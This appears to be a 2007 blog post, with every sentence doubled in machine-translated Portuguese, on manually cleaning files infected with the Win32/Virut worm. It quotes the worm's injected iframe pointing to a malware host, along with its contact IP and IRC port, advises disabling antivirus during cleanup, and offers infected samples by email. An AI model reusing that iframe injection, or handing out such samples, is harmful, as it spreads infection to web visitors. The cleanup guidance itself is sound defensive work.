Fixes for files infected with Win32/virut.Virtob and Variants Correções para a arquivos infectados com Win32/virut.Virtob e Variantes

    • Nov Nov
    • 12 12

    Fixes for files infected with Win32/virut.Virtob and Variants Correções para a arquivos infectados com Win32/virut.Virtob e Variantes

    Posted by Nick B 9 months, 1 week ago . Postado por Nick B 9 meses, 1 ano atrás.

    Filed under Windows & Worm . Arquivado em Windows & Worm.

    Activity Monitor vírus ícones I found this frustrating that most Anti-virus product will deleted or quarantine your infected files. Eu encontrei esse frustrante que a maioria dos Anti-vírus produto será excluído ou quarentena seus arquivos infectados. I lost many projects because of this worms. Eu perdi porque muitos projectos deste worms.

    Don’t used “auto-clean/fix” online scanner if you favors your projects. Não utilizar "auto-clean/fix" on-line scanner se você favores seus projetos. Belows is step by steps fixes for win32/Virut. É por etapas abaixo passo fixa, para win32/Virut. If you dont like manual editing you’ll need a search and replace tools for removing the embed code inside the infected files. Se você não gostou manual edição você precisará de uma pesquisa e substituição de ferramentas para remover o código de incorporação no interior do arquivos infectados.

    1. Make sure all of the infected (*.exe win32/virtob) files has been quarantine. Certifique-se de todos os infectados (*. exe win32/virtob) tem sido arquivos de quarentena.
    2. Optionally block outbound access to 78.109.19.139:80 & irc port 65520 in your firewall settings. Opcionalmente saída bloquear o acesso ao porto irc 78.109.19.139:80 & 65520 em suas configurações de firewall.
    3. Disabled AntiVirus if any. Deficientes AntiVirus se for caso disso.
    4. Shutdown your PC and start windows on SafeMode (Press F8 or F5 after BIOS screen). Encerrar o seu PC e começar a SafeMode janelas (Press F8 ou F5 após BIOS tela).
    5. Search all files with *.htm, *.html, *.php, *.asp extensions. Pesquisar em todos os arquivos *. htm, *. html, *. php, *. asp extensões.
      delete or replace the following text (strings) apagar ou substituir o seguinte texto (strings) 

       <iframe src="http://ntkrnlpa.info/cr/?i=1" height="1" width="1"></iframe> <iframe src="http://ntkrnlpa.info/cr/?i=1" height="1" width="1"> </ iframe>

    Search and Replace Tools Pesquisar e substituir ferramentas

    • For windows - there is lots of similar tools and I’m not sure which one to recommend as it seem most did the same thing so Google for “search-and-replace” pick your best. Para o Windows - há lotes de ferramentas semelhantes e não tenho certeza que a recomendar uma vez que parecem mais fez a mesma coisa tão Google para "sites de pesquisa e substituí-" escolher o seu melhor.
    • For Cygwin or *nix bash console - Used sed commands to search & replace strings in all infected files. Para Cygwin ou * nix bash console - Usado sed comandos de busca e substituir strings em todos os arquivos infectados.
    • Python in windows - You can try this solutions . Python em janelas - Você pode tentar usar esse soluções.

    Win32/Virut Virustotal.com Results Win32/Virut Virustotal.com resultados

    Antivirus Version Versão Last Update Última Atualização Result Resultado
    AhnLab-V3 AHNLAB-V3 2007.11.12.0 2007.11.12 - --
    AntiVir 7.6.0.34 2007.11.12 W32/Virut.AF
    Authentium 4.93.8 2007.11.10 - --
    Avast 4.7.1074.0 2007.11.11 Win32:Virtob Win32: Virtob
    AVG 7.5.0.503 2007.11.11 Win32/Virut
    BitDefender 7.2 7,2 2007.11.12 Win32.Virtob.6.Gen
    CAT-QuickHeal 9.00 9,00 2007.11.12 W32.Virut.K
    ClamAV 0.91.2 2007.11.12 W32.Virut-5
    DrWeb Drweb 4.44.0.09170 2007.11.12 Win32.Virut.19
    eSafe ESAFE 7.0.15.0 2007.11.08 - --
    eTrust-Vet 31.2.5289 2007.11.12 Win32/Virut.6375
    Ewido 4.0 4,0 2007.11.12 - --
    FileAdvisor 1 2007.11.12 - --
    Fortinet 3.11.0.0 2007.10.19 W32/Virut.AE
    F-Prot 4.4.2.54 2007.11.10 W32/Injector.A.gen!Eldorado W32/Injector.A.gen! Eldorado
    F-Secure 6.70.13030.0 2007.11.12 Virus.Win32.Virut.ab
    Ikarus T3.1.1.12 2007.11.12 Win32.Virtob.AS
    Kaspersky 7.0.0.125 2007.11.12 Virus.Win32.Virut.ab
    McAfee 5160 2007.11.09 W32/Virut.g
    Microsoft 1.3007 2007.11.12 Virus:Win32/Virut.Q Vírus: Win32/Virut.Q
    NOD32v2 2653 2007.11.12 - --
    Norman 5.80.02 2007.11.09 W32/Virut.W
    Panda 9.0.0.4 2007.11.11 W32/Virutas.W
    Prevx1 V2 2007.11.12 - --
    Rising 20.18.02.00 2007.11.12 Win32.Virut.z
    Sophos 4.23.0 2007.11.12 W32/Vetor-G
    Sunbelt 2.2.907.0 2007.11.09 VIPRE.Suspicious
    Symantec 10 2007.11.12 W32.Virut.W
    TheHacker 6.2.9.124 2007.11.12 W32/Virut.gen
    VBA32 3.12.2.4 2007.11.11 - --
    VirusBuster 4.3.26:9 2007.11.11 Win32.Virut.Gen.4
    Webwasher-Gateway 6.0.1 2007.11.12 Win32.Virut.AF

    Notes on Microsoft Windows Malicious Software Removal Tool Notas sobre Microsoft Windows Ferramenta de Remoção de Software Malicioso

    Update On: Nov,20 2007 by NoahArk Em Atualização: Nov, 20 2007 por NoahArk
    I have Win.32/virut files in my archive (for backup purpose). Tenho Win.32/virut arquivos no meu arquivo (backup para o efeito). Last week I installed Microsoft Windows Malicious Software Removal tool v1.35 (Nov 13, 2007, KB890830). Na semana passada, instalado Microsoft Windows Ferramenta de Remoção de Software Malicioso v1.35 (Nov 13, 2007, KB890830).

    Ferramenta de Remoção de Software Malicioso Microsoft Microsoft’s claimed this tool can fixes w32/Virut . A Microsoft alegou esta ferramenta pode w32/Virut correções. But the results is much worsed than I expected. Mas é muito worsed os resultados que eu esperava. It doesn’t detect Win32/Virut on my windows XP SP2 instead halfway before the scan complete its trigger the worm and starts spreading as Win32/virtob & Virut[AW] (infecting *.exe & *.html). Não se detectam Win32/Virut no meu Windows XP SP2 em vez meia antes da varredura completa seu acionar o worm e começa a espalhar as Win32/virtob & Virut [AW] (infectando *. exe & *. html). I’d removed all Microsoft Removal tools (MS Malicious Software Removal tool, MS Defender,MS Baseline Security Analyzer). Eu removidas todas as ferramentas Microsoft Remoção (Ferramenta de Remoção de Software Mal MS, MS Defender, MS Baseline Security Analyzer). Microsoft Developer should have know better on how to prevent most of these type infections.Its their own design flaw and products. Microsoft Developer deveria ter conhecer melhor sobre a forma de prevenir a maior parte destes tipos infections.Its sua própria concepção falha e produtos.

    I still keep the infected Win32/Virut files, if anyone need it please send an email to Eu ainda manter os arquivos infectados Win32/Virut, se alguém precisa dele, envie um e-mail para nhnoah email . My request to Microsoft Team, they should clean this crapy worms so all those unfortunate client’s (including me) wont have to hunt down on pricey antivirus solutions. O meu pedido para a Microsoft Team, eles deveriam limpar este crapy todos aqueles vermes tão infeliz do cliente (incluindo eu) costuma ter que estabelece a caçar caro soluções antivírus.

    W32/Virut and ntkrnlpa.info W32/Virut e ntkrnlpa.info

    The worms started spreading since September 2006 . Os worms começou espalhando desde setembro de 2006. After one year anniversay It still in the wild like it will never stop. Após um ano anniversay Ela ainda em estado selvagem como ele nunca irá parar.

    I’d send a letter to ntkrnlpa.info ISP (hosting.ua), and they have closed down the sites for good. Eu iria enviar uma carta ao ntkrnlpa.info ISP (hosting.ua), e eles têm encerrados os sites de bom. And also google is blocking the site too it will give you a warning notice if search for the particular url. E também o Google está bloqueando o site também lhe irá dar-lhe uma notificação se a busca de URL em particular.

    This worm spread via simple html tags and increased the filesize around 8kb. Este worm espalhar através de simples tags html e aumentou o tamanho do ficheiro de cerca de 8KB. Because of this simple method and low damage most Anti-Virus and security vendor label it as medium and low. Devido a este método simples e de baixo danos mais Anti-Virus e de Segurança vendedor rotulá-la como média e baixa. The thread label is debatable. O tópico rótulo é discutível.

    Based on wikipedia “Usage share of Web Browser Statistics” , 81% of Internet users is using Microsoft Internet Explorer (50% of this weblog visitors is on IE too ), IE browser doesn’t blocked IFRAME that can be a problem. Com base na wikipedia "Utilização quota de Estatística Web Browser", 81% dos utilizadores da Internet está usando o Microsoft Internet Explorer (50% dos visitantes deste weblog é também a IE), navegador IE não bloqueou IFRAME que pode ser um problema.

    Imagine if some webmaster uploaded an infected files on heavy traffic websites like myspace and facebook. Imagine se algum webmaster carregado arquivos infectados com um tráfego intenso sites, como o MySpace eo Facebook. The results could be disaster. Os resultados poderiam ser desastre. Nobody want to see its happening. Ninguém quer ver o seu acontecer.

    Related Entries Entradas Relacionadas

    About the Author Sobre o Autor

    Tags: Palavras-chave:
    • November 12, 2007 at 12:35 pm 12 de novembro de 2007 em 12:35
    • February 8, 2008 at 10:58 am 8 de fevereiro de 2008, 10:58 am
    • 0.3 0,3
    • url URL

    • 2 Responses toFixes for files infected with Win32/virut.Virtob and Variants 2 Responses para "Correções de arquivos infectados com Win32/virut.Virtob e Variantes"

      Trackback URL: Trackback URL: Use the TrackBack url ↑ to ping this article. Use o ping TrackBack url ↑ a este artigo. If your blog does not support Trackbacks you might want to leave a comment instead. Se o seu blog não suporta trackbacks você pode querer deixar um recado vez.
          • Feb Fevereiro
          • 05 05
          • http://www.gravatar.com/avatar/f99366a8d8e8dc45dea20f78d9ea10fe?s=58&d=http://42.kaizeku.com/wp-content/themes/wp-istalker-pb/images/gravatar.png&r=G http://www.gravatar.com/avatar/f99366a8d8e8dc45dea20f78d9ea10fe?s=58&d=http://42.kaizeku.com/wp-content/themes/wp-istalker-pb/images/gravatar.png&r=G
        • RE: Fixes for files infected with Win32/virut.Virtob and Variants RE: Correções para arquivos infectados com Win32/virut.Virtob e Variantes
          Fixes for files infected with Win32/virut.Virtob and Variants Bernd P 6 months, 2 weeks ago 3 url · microId Correções para a arquivos infectados com Win32/virut.Virtob e variantes Bernd P 6 meses, 2 semanas atrás 3 url microId

          The problem in prevention of viruses like the Virut types is that they change the "bothosts" as well as the as the encryption with every new variant coming out. O problema da prevenção do vírus como os tipos Virut é que se altere o "bothosts", bem como a como a criptografia com cada nova variante saem. A possible good solution to prevent your machine from making unauthorized unwanted connects by any unknown process or program is to have eg a ZoneAlarm firewall installed (which allows precisely blocking of eg STMP for specified programs - the default is 'blocked' - , specified port blocking (eg IRC ), preventing and denying any unsolicited inbound traffic, as well as the adaptive IDENT port hiding,(means this is a true stealth firewall).and specified security behavior concerning internet, intranet, local, safe zones, as well as a 5-step safety profile to set for specified programs). Uma boa solução possível para evitar a sua máquina de fazer não autorizada indesejadas conecta a qualquer processo ou desconhecida programa é ter por exemplo, um ZoneAlarm firewall instalados (que permite precisamente por exemplo, o bloqueio dos programas previstos para STMP - o padrão é "bloqueada" -, bloqueando porta especificada (por exemplo, IRC), para prevenir e negando qualquer tráfego inbound não solicitados, bem como a adaptação IDENT porto clandestinidade, (significa que esse é um verdadeiro stealth firewall). especificadas de segurança e de comportamento relativo internet, intranet, local, zonas seguras, assim como um 5-passo perfil de segurança estabelecidos para programas especificados).

          Additionally the user is informed about every network action and access attempts - ingoing as well outgoing - with source, Além disso, o usuário é informado sobre todas as acções de rede e de acesso tentativas - ingoing bem como cessante - a fonte,
          target, port and the program or process name which initiates the connection. alvo, porto e do nome do programa ou processo que inicia a ligação. Preventing spam-bot behavior means : only allow 'your' known Mail programs to send mails. Prevenir spam-bot comportamento significa: só permitem "seus" programas conhecidos Mail para enviar mails. NEVER store ANY PASSWORDS on the machine or in the mail program! NUNCA armazenar todas as senhas na máquina ou no correio programa! Set ' SMTP action' to 'password required' even if your SMTP provider doesn't need (if so this means anonymous SMTP is allowed, then you Defina 'SMTP ação' para 'senha necessária "mesmo que o seu fornecedor não precisa SMTP (se assim for, isto significa anônimo SMTP é permitido, então você
          have a BAD ISP which is really inviting spambots to spread their notorious garbage all around the world!). ter um mau ISP que é realmente convidativo SPAMbots para difundir as suas notórias lixo em todo o mundo!).



          Essential Safety-rules are still ignored by the ISP in such cases. - Regras essenciais de segurança ainda são ignorados pelo ISP em tais casos. By the same way, the customers of such ISP are the victims of these. Através da mesma forma, os clientes desses ISP são as vítimas destes. Go looking for another ISP if possible. Ir à procura de outro provedor, se possível. All other programs should be blocked for SMTP (and IRC) protocols as well. Todos os outros programas devem ser bloqueados para SMTP (e IRC) protocolos também. That is essential in those days to keep an infected machine quiet towards the internet even if it is eventually infected by some weird worm, or botclient software. Isso é essencial para manter esses dias em uma máquina infectada calma em relação à internet mesmo que seja eventualmente infectados por algum estranho worm, ou botclient software. (Then your PC is called 'stoned' or how it is also said by the security people, a so-called 'Zombie'). (Então, o PC é chamada "apedrejados" ou como também é dito pela segurança do povo, um dos chamados "Zombie"). Never allow HTTP or any other outgoing requests for other programs aside of your known browser, media-players or Nunca permita que HTTP ou qualquer outra saída pedidos de outros programas lado de seu navegador conhecido, meios de comunicação-ou jogadores
          file transfer, mail and chat programs. - transferência de ficheiros, programas de bate-papo e correio electrónico. Be aware that especially 'Adware','Nag-Ware' and 'Spy-ware'-charged programs are always trying to 'phone home'! Estar ciente de que, especialmente 'Adware', 'Nag-ware' e 'Espião-ware'-carregada programas são sempre tentando "telefone casa"!



          Same does Malware which attempts to reach or at least listens to their 'master hosts', (of course allow such for the safety facilities on your system to update themselves by their known code hosts). Mesmo não Malware que tenta alcançar, ou pelo menos ouve a sua "master hosts", (é claro que tais instalações para a segurança em seu sistema para atualizar os seus próprios conhecido por código anfitriões). Using a host list which redirects therein contained servers to nowhere (means the localhost) is also a good hint. Usando uma lista de acolhimento que redireciona a lado nenhum servidores nele contidos (significa o localhost) também é uma boa dica. This file is also protected from being tampered with (unauthorized deletions or additions by any software or website scripts) by third party software (ie ZoneAlarm, McAffee, Nod32). Esse arquivo também está sendo protegido de mexer com (não autorizada supressões ou acréscimos de qualquer software ou website scripts) a terceira parte de software (ou seja, ZoneAlarm, McAffee, NOD32).

          • (cc) 2008 Bernd P. (cc) 2008 Bernd p.
          • Ie-6 on Win98 · #1 Ie-6 em Win98 # 1
          • May Maio
          • 06 06
          • http://www.gravatar.com/avatar/ced02c315e8f5a22e4599edf97f3839c?s=58&d=http://42.kaizeku.com/wp-content/themes/wp-istalker-pb/images/gravatar.png&r=G http://www.gravatar.com/avatar/ced02c315e8f5a22e4599edf97f3839c?s=58&d=http://42.kaizeku.com/wp-content/themes/wp-istalker-pb/images/gravatar.png&r=G
        • RE: Fixes for files infected with Win32/virut.Virtob and Variants RE: Correções para arquivos infectados com Win32/virut.Virtob e Variantes
          Fixes for files infected with Win32/virut.Virtob and Variants zyro 3 months, 2 weeks ago 3 url · microId Correções para a arquivos infectados com Win32/virut.Virtob e variantes zyro 3 meses, 2 semanas atrás 3 url microId

          hi there oi lá
          can u please email me these files I just wanna use them for learning purpose u pode por favor me escreva esses arquivos Gostaria apenas de usá-los para a aprendizagem de propósito

          THANKS BUDDY AGRADECIMENTO BUDDY

          • (cc) 2008 zyro. (cc) 2008 zyro.
          • Ie-7 on Winvista · #2 Ie-7 em Winvista # 2

    RSS feed for comments in this post RSS feed para comentários nesta postagem

    "write as if you were talking to a good friend (in front of your mother)." "escrever como se estivesse conversando com uma boa amiga (na frente de sua mãe)."

    .have your say . a sua opinião

    Disclaimer: For any content that you post, you hereby grant to Kakkoi the royalty-free, irrevocable, perpetual, exclusive and fully sublicensable license to use, reproduce, modify, adapt, publish, translate, create derivative works from, distribute, perform and display such content in whole or in part, world-wide and to incorporate it in other works, in any form, media or technology now known or later developed. Some rights reserved. Aviso: Para qualquer conteúdo que você postar, você decide conceder a Kakkoi a título gratuito, irrevogável, perpétuo, exclusiva e totalmente sublicenciável para usar, reproduzir, modificar, adaptar, publicar, traduzir, criar trabalhos derivativos, distribuir, executar e exibir tal conteúdo, no todo ou em parte, em todo o mundo e para integrá-la em outras obras, sob qualquer forma, mídia ou tecnologia atualmente conhecida ou posteriormente desenvolvida. Alguns direitos reservados.

MySQL query error MySQL query error